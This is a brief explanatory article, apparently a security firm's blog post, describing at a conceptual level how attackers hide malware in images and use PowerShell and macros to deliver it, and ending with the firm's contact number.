Steganography is the act of hiding secret information within an ordinary, non-secret file or message to avoid detection. The main strengths of steganography are its capacity to keep a message as secret as possible and hide a large amount of data. Cyber attackers are exploiting these strengths to target organizations by launching sophisticated attacks.
Cyber attacks employ steganography to embed malicious code in seemingly benign content to bypass an organization’s cyber security. The basic layout of a cyber attack using steganography is based on four concepts.
- Social Engineering: When the user opens the compromised document, the malware code instructs the victim to enable content in the document.
- Network Security Monitoring Evasion: Once the content is enabled, the document runs a PowerShell script to download a file with embedded malware. The file may be as simple as a popular image, a wallpaper, etc. and is stored on a remote server.
- Manual Analysis Evasion: The attackers make use of obfuscated VB macros to decode the malicious content hidden within the pixels of these images and install the malware.
- Persistence: The malware is designed to register scheduled tasks to enable the script to survive system reboots.
What Is PowerShell?
Microsoft introduced it as a scripting language and command line. It is now open-source and cross-platform enabling developers to use multiple languages and libraries for building applications for mobile, gaming, desktop, and IoT solutions. It is popular among cyber criminals for launching steganography attacks because:
- It’s easy-to-use and versatile, providing access to all major OS functions.
- It is used and trusted by many administrators, allowing PowerShell malware to blend in with benign activity on the network.
What Type Of Information Hidden Is Via Steganography By Cyber Criminals?
Cyber criminals can use the information hiding at different stages of a cyber attack depending upon the kind of information hidden.
- Identities: Anonymization techniques are used to hide the identities of communicating parties.
- Communication: Steganography is used to hide the fact that a conversation is taking place. It conceals the data packet flow by using traffic-type obfuscation methods.
- Content: Cyber criminals may hide the content of data but not the transmission or presence of data itself.
- Code: The structure of executable malicious code is hidden by binary code obfuscation and masquerading techniques.
With an increase in the number of sophisticated cyber-attacks using Steganographic techniques, the organizations are required to update their cyber security measures.
For more information on the use of steganography in cyber attacks, contact Centex Technologies at (254) 213 – 4740.